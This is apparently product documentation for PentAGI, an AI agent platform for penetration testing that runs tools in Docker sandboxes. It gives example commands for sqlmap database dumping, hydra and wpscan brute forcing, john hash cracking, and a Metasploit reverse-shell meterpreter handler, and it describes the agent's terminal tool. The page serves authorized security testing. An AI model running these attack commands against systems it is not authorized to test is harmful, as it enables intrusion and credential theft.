Skip to main content

Overview

PentAGI provides a comprehensive suite of professional security testing tools, all executed in isolated Docker containers for maximum safety. Every tool execution is logged, monitored, and stored in long-term memory for future reference.

20+ Pro Tools

Industry-standard security testing utilities

Sandboxed Execution

Complete isolation in Docker containers

Automatic Logging

All commands and outputs recorded

Smart Selection

AI-powered tool and image selection

Available Tools

PentAGI includes 20+ professional security tools out of the box:

Network Scanning & Discovery

Network Mapper - The industry-standard network scanning toolCapabilities:
  • Port scanning and service detection
  • OS fingerprinting
  • Vulnerability detection with NSE scripts
  • Network topology mapping
Example Usage:
# Basic port scan
nmap -sV -p- target.com

# Vulnerability scan with scripts
nmap --script vuln target.com

# Aggressive scan with OS detection
nmap -A -T4 192.168.1.0/24
High-Speed Port Scanner - Fastest port scanner for large networksCapabilities:
  • Scan entire internet in under 5 minutes
  • Custom packet crafting
  • Banner grabbing
Example Usage:
# Fast scan of common ports
masscan -p1-65535 192.168.1.0/24 --rate=10000

# Banner grabbing
masscan -p80,443 10.0.0.0/8 --banners

Web Application Testing

Automatic SQL Injection Tool - Detect and exploit SQL injection flawsCapabilities:
  • Automatic SQL injection detection
  • Database fingerprinting
  • Data extraction from databases
  • Database takeover features
Example Usage:
# Test URL for SQL injection
sqlmap -u "http://target.com/page?id=1" --batch

# Extract database tables
sqlmap -u "http://target.com/page?id=1" --tables

# Dump specific table
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
Web Server Scanner - Comprehensive web server vulnerability scannerCapabilities:
  • 6700+ potential vulnerabilities
  • Outdated software detection
  • Dangerous files and CGI scanning
  • Server misconfiguration checks
Example Usage:
# Basic scan
nikto -h http://target.com

# SSL/TLS testing
nikto -h https://target.com -ssl

# Scan with custom plugins
nikto -h target.com -Plugins "headers,cookies"
WordPress Security Scanner - Specialized WordPress vulnerability scannerCapabilities:
  • WordPress version detection
  • Plugin/theme vulnerability scanning
  • User enumeration
  • Password brute forcing
Example Usage:
# Basic WordPress scan
wpscan --url http://target.com

# Enumerate vulnerable plugins
wpscan --url http://target.com --enumerate vp

# Brute force attack
wpscan --url http://target.com --usernames admin --passwords passwords.txt

Exploitation Frameworks

Metasploit Framework - The world’s most used penetration testing frameworkCapabilities:
  • 2300+ exploit modules
  • Payload generation and delivery
  • Post-exploitation modules
  • Vulnerability validation
Example Usage:
# Launch msfconsole
msfconsole

# Search for exploits
search type:exploit platform:linux

# Use specific exploit
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit

Credential Testing

Network Login Cracker - Fast and flexible password crackerCapabilities:
  • 50+ protocol support (SSH, FTP, HTTP, etc.)
  • Parallel connection attacks
  • Custom brute force patterns
  • Restore interrupted sessions
Example Usage:
# SSH brute force
hydra -l admin -P passwords.txt ssh://target.com

# Web form brute force
hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
hydra -L users.txt -P passwords.txt ftp://192.168.1.100
John the Ripper - Password hash crackerCapabilities:
  • Hash type auto-detection
  • Wordlist and brute force modes
  • Custom rule-based attacks
  • Support for numerous hash types
Example Usage:
# Crack password hashes
john --wordlist=rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Incremental mode
john --incremental hashes.txt

SSL/TLS Testing

SSL/TLS Security Scanner - Comprehensive SSL/TLS testing toolCapabilities:
  • Protocol and cipher testing
  • Certificate validation
  • Known vulnerability detection (Heartbleed, POODLE, etc.)
  • HTTP security headers analysis
Example Usage:
# Full SSL/TLS test
testssl.sh https://target.com

# Test specific vulnerabilities
testssl.sh --heartbleed --ccs-injection target.com:443

# Check HTTP headers
testssl.sh --headers https://target.com

DNS & Subdomain Enumeration

Subdomain Discovery Tool - Passive subdomain enumerationCapabilities:
  • Passive subdomain discovery
  • Multiple data source integration
  • Fast and reliable enumeration
Example Usage:
# Find subdomains
subfinder -d target.com

# Output to file
subfinder -d target.com -o subdomains.txt

# Recursive enumeration
subfinder -d target.com -recursive
DNS Toolkit - Fast DNS resolution and validationCapabilities:
  • DNS record queries
  • Wildcard filtering
  • Fast DNS validation
  • Multiple resolver support
Example Usage:
# Resolve subdomains
cat subdomains.txt | dnsx -a -resp

# Check specific records
echo target.com | dnsx -a -aaaa -cname -mx

# Wildcard filtering
cat subdomains.txt | dnsx -wd target.com

Terminal Tool Integration

All security tools are accessed through PentAGI’s terminal tool:

Terminal Tool Schema

interface TerminalAction {
  message: string;     // Description of what you're doing
  cwd?: string;        // Working directory (default: /workspace)
  input: string;       // Command to execute
  timeout?: number;    // Timeout in seconds (default: 60, max: 1200)
  detach?: boolean;    // Run in background (default: false)
}

Execution Examples

{
  "name": "terminal",
  "args": {
    "message": "Scanning target for open ports and services",
    "input": "nmap -sV -p- target.com",
    "timeout": 300
  }
}

Sandboxed Environment

Docker Isolation

Every penetration test runs in an isolated Docker container: 
// Container capabilities
capAdd := []string{"NET_RAW"}  // Raw socket access for scanning
if cfg.DockerNetAdmin {
    capAdd = append(capAdd, "NET_ADMIN")  // Network administration
}

// Container configuration
container.Config{
    Image: cfg.Image,  // Security tools image
    Entrypoint: []string{"tail", "-f", "/dev/null"},
}

container.HostConfig{
    CapAdd: capAdd,  // Limited capabilities
}

Security Features

Network Isolation

Containers run in isolated networks with controlled access to targets

Resource Limits

CPU and memory limits prevent resource exhaustion

Capability Restrictions

Minimal Linux capabilities (NET_RAW, optional NET_ADMIN)

Automatic Cleanup

Containers automatically destroyed after test completion

Container Lifecycle

Execution Logging

Automatic Command Logging

All terminal interactions are automatically logged: 
// Command input (stdin)
formattedCommand := FormatTerminalInput(cwd, command)
tlp.PutMsg(ctx, database.TermlogTypeStdin, formattedCommand, containerID, taskID, subtaskID)

// Command output (stdout)
formattedResults := FormatTerminalSystemOutput(results)
tlp.PutMsg(ctx, database.TermlogTypeStdout, formattedResults, containerID, taskID, subtaskID)

Terminal Log Format

\033[33m $ nmap -sV target.com\033[0m

Memory Storage

Terminal outputs are automatically stored in vector database: 
// Tools stored in long-term memory
allowedStoringInMemoryTools = [
    "terminal",  // All command outputs
    "file",      // File operations
    // ... other tools
]

// Stored with metadata
doc.Metadata = {
    "task_id": taskID,
    "subtask_id": subtaskID,
    "flow_id": flowID,
    "tool_name": "terminal",
    "doc_type": "tool_result",
    "part_size": len(chunk),
    "total_size": len(fullOutput),
}

Smart Container Management

Dynamic Image Selection

PentAGI automatically selects the appropriate Docker image based on task requirements:
.env
# Default security tools image
DOCKER_IMAGE=vxcontrol/pentagi-tools:latest

# Alternative images for specific needs
# DOCKER_IMAGE=kalilinux/kali-rolling
# DOCKER_IMAGE=custom-security-tools:v1

Primary Container

Each flow gets a dedicated primary container: 
// Container naming
func PrimaryTerminalName(flowID int64) string {
    return fmt.Sprintf("pentagi-terminal-%d", flowID)
}

// Container lifecycle
Prepare()  -> Spawn primary container
Execute()  -> Run security tools
Release() -> Destroy container

Container Status Tracking

type ContainerStatus string

const (
    ContainerStatusCreated  ContainerStatus = "created"
    ContainerStatusRunning  ContainerStatus = "running"
    ContainerStatusExited   ContainerStatus = "exited"
    ContainerStatusError    ContainerStatus = "error"
)

File Management

Manage files in the container environment:

File Tool Schema

interface FileAction {
  message: string;     // Description of operation
  action: "read" | "update";  // File operation type
  path: string;        // File path in container
  content?: string;    // Content for update operations
}

File Operations

{
  "name": "file",
  "args": {
    "message": "Reading exploit payload",
    "action": "read",
    "path": "/workspace/exploit.py"
  }
}

Timeout Management

Configurable Timeouts

const (
    defaultExecCommandTimeout = 5 * time.Minute   // 300 seconds
    defaultExtraExecTimeout   = 5 * time.Second    // Buffer time
    defaultQuickCheckTimeout  = 500 * time.Millisecond
)

// Hard limits
if timeout <= 0 || timeout > 20*time.Minute {
    timeout = defaultExecCommandTimeout  // 5 minutes default
}

Background Execution

Long-running tasks can execute in background: 
{
  "name": "terminal",
  "args": {
    "message": "Running extensive network scan in background",
    "input": "nmap -sV -p- --min-rate=1000 192.168.1.0/24 -oA scan_results",
    "timeout": 3600,
    "detach": true
  }
}
Detached Execution Behavior:
  • Returns immediately with status message
  • Continues running in background
  • Check results later with file reads
  • 500ms quick check before detaching

Best Practices

  • Use nmap for initial reconnaissance
  • Use specialized tools (sqlmap, nikto) for specific vulnerabilities
  • Leverage metasploit for exploitation
  • Use hydra/john for credential testing
  • Set appropriate timeouts for long-running scans
  • Use detached mode for extensive operations
  • Monitor container resource usage
  • Clean up containers after completion
  • Save scan results to files for later analysis
  • Use structured output formats (JSON, XML) when possible
  • Store successful techniques in memory
  • Leverage automatic result summarization
  • Always test in authorized environments
  • Use appropriate scan intensity to avoid DoS
  • Verify target scope before testing
  • Follow responsible disclosure practices

Autonomous Testing

Learn about AI-powered test automation

Reporting

Generate professional security reports

Monitoring

Track tool execution and performance

Quick Start

Get started with PentAGI

Build docs developers (and LLMs) love

Get started for freeTalk to us